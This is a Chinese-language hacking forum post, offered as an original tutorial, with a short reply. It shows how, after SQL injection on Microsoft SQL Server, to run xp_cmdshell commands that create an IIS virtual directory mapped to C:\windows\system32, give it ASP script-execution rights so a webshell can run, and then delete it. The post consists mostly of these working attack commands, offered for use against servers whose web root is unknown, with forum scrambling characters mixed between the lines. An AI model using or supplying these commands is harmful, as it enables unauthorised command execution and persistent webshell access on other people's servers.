返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
! O5 K0 O; }- c' a5 j
7 N# g+ h9 Q. N, ~exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
' ^3 d5 A6 y8 o$ L* n建立虚拟目录win,指向c:\windows\system32
" ]1 a- U" ]9 v- `4 M7 y. p! |; Eexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'2 x; Z* c$ r) }0 ^7 g
让win句有解析asp脚本权限
5 c" H. N' N7 U$ J; {3 O9 G% Q: x+ n$ U) {6 F0 c  K6 r
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
, H/ |9 r" u6 L" s- ]' c# e删除虚拟目录。
' }) x% [( R1 n找不到web绝对路径的一种解决办法,, {8 y9 t- M8 D1 K1 I

: u2 m# {+ R0 d# Z* v403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表